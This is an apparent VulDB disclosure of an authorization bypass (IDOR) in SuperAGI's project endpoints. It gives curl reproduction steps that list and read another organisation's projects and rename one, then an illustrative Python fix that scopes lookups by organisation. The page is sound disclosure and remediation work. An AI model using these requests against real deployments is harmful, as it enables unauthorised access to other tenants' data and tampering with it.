Submission #791082: SuperAGI up to c3c1982 Authorization Bypass Through User-Controlled Key (CWE-639)

Title: SuperAGI up to c3c1982 Authorization Bypass Through User-Controlled Key (CWE-639)
Description:

# Technical Details

An Insecure Direct Object Reference (IDOR) exists in the `get_project`, `update_project`, and `get_projects_organisation` methods in `superagi/controllers/project.py` of SuperAGI. The application does not verify that the target project or organisation belongs to the requesting user. All three endpoints only validate the JWT via `Depends(check_auth)` and perform no organisation membership check.

# Vulnerable Code

File: superagi/controllers/project.py

Methods: get_project (lines 70-89), update_project (lines 92-124), get_projects_organisation (lines 127-151)

Why: all three endpoints use the attacker-controlled `project_id` or `organisation_id` URL parameter without any ownership check, allowing cross-organisation data access and modification.

# Reproduction

1. Authenticate with an attacker account and obtain a valid JWT.
2. List all projects of the victim's organisation:

```bash
curl -s -H "Authorization: Bearer $JWT" "http://localhost:3000/api/projects/get/organisation/3"
```

3. Read a specific victim project:

```bash
curl -s -H "Authorization: Bearer $JWT" "http://localhost:3000/api/projects/get/1"
```

4. Modify the victim's project name:

```bash
curl -s -X PUT -H "Authorization: Bearer $JWT" -H "Content-Type: application/json" \
  "http://localhost:3000/api/projects/update/1" \
  -d '{"name":"HACKED Project","description":"compromised"}'
```

# Impact

- Information disclosure: an attacker enumerates all projects and their configurations across all organisations.
- Data integrity: project names and descriptions can be modified, disrupting team workflows.
- Reconnaissance: the project listing reveals organisational structure and agent deployment patterns.
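The three endpoints above share one defect: the JWT proves who the caller is, but the `project_id` / `organisation_id` taken from the URL is never tied back to the caller's organisation. The following is an added example, not SuperAGI's own controller code, showing the vulnerable shape next to a hardened one in plain Python. `User`, `Project`, the in-memory `PROJECTS` store and the `HTTPError` class are constructed stand-ins for SuperAGI's SQLAlchemy models and FastAPI's `HTTPException`; their field names are assumptions, and the functions are named after the page's endpoints only to make the mapping obvious.

```python
"""Added example (not SuperAGI code): the IDOR pattern beside a scoped lookup.

User, Project and PROJECTS are constructed stand-ins for SuperAGI's ORM models;
field names are assumptions. HTTPError stands in for FastAPI's HTTPException so
the example runs without FastAPI installed.
"""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional


class HTTPError(Exception):
    """Stand-in for FastAPI's HTTPException."""

    def __init__(self, status_code: int, detail: str) -> None:
        super().__init__(f"{status_code}: {detail}")
        self.status_code = status_code
        self.detail = detail


@dataclass
class User:
    """What `check_auth` is assumed to resolve the JWT into: caller plus their org."""
    id: int
    organisation_id: int


@dataclass
class Project:
    id: int
    organisation_id: int
    name: str
    description: str = ""


# Constructed sample data: projects 1 and 2 belong to organisation 3 (the victim),
# project 10 to organisation 4 (the attacker's own organisation).
PROJECTS: Dict[int, Project] = {
    1: Project(1, 3, "victim-prod", "production agents"),
    2: Project(2, 3, "victim-staging"),
    10: Project(10, 4, "attacker-sandbox"),
}


# --- Vulnerable shape: the caller is authenticated, but the key from the URL is trusted ---

def get_project_vulnerable(project_id: int, user: User) -> Project:
    project = PROJECTS.get(project_id)  # no ownership predicate at all
    if project is None:
        raise HTTPError(404, "Project not found")
    return project


def get_projects_organisation_vulnerable(organisation_id: int, user: User) -> List[Project]:
    # Any authenticated caller may list any organisation's projects.
    return [p for p in PROJECTS.values() if p.organisation_id == organisation_id]


# --- Hardened shape: every lookup is scoped to the organisation bound to the session ---

def _project_for_user(project_id: int, user: User) -> Project:
    """Single chokepoint: both the project id and the organisation must match.

    A project in another organisation is reported as 404 rather than 403 so the
    response does not confirm that the guessed id exists.
    """
    project = PROJECTS.get(project_id)
    if project is None or project.organisation_id != user.organisation_id:
        raise HTTPError(404, "Project not found")
    return project


def get_project(project_id: int, user: User) -> Project:
    return _project_for_user(project_id, user)


def update_project(project_id: int, user: User, name: Optional[str] = None,
                   description: Optional[str] = None) -> Project:
    project = _project_for_user(project_id, user)  # ownership checked before any write
    if name is not None:
        project.name = name
    if description is not None:
        project.description = description
    return project


def get_projects_organisation(organisation_id: int, user: User) -> List[Project]:
    # The organisation id stays in the URL for API compatibility, but it is only
    # honoured when it equals the organisation bound to the authenticated session.
    if organisation_id != user.organisation_id:
        raise HTTPError(403, "Not a member of this organisation")
    return [p for p in PROJECTS.values() if p.organisation_id == organisation_id]


def status_of(call: Callable[[], object]) -> Optional[int]:
    """Return the HTTP status an endpoint call would produce, or None on success."""
    try:
        call()
    except HTTPError as err:
        return err.status_code
    return None


if __name__ == "__main__":
    attacker = User(id=99, organisation_id=4)
    print("vulnerable read of project 1:", get_project_vulnerable(1, attacker).name)
    print("hardened read of project 1:", status_of(lambda: get_project(1, attacker)))
    print("hardened update of project 1:",
          status_of(lambda: update_project(1, attacker, name="HACKED Project")))
    print("hardened listing of org 3:",
          status_of(lambda: get_projects_organisation(3, attacker)))
```

The point of `_project_for_user` is that the ownership predicate lives in one place that every read and write goes through, so a new endpoint cannot forget it. In a real SQLAlchemy controller the equivalent is to filter on both the project id and the caller's organisation id in the same query rather than fetching by id and checking afterwards; the exact model and session names in SuperAGI are not shown here and would need to be confirmed against the repository.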
Source: https://gist.github.com/YLChen-007/ac40da2253c7364d043c0dfe3275190b
User: Eric-z (UID 95890)
Submitted: 27/03/2026 13:01 (24 days ago)
Moderated: 19/04/2026 18:13 (23 days later)
Status: accepted
VulDB entry: 358249 [TransformerOptimus SuperAGI up to 0.0.14 project.py privilege escalation]
Points: 20
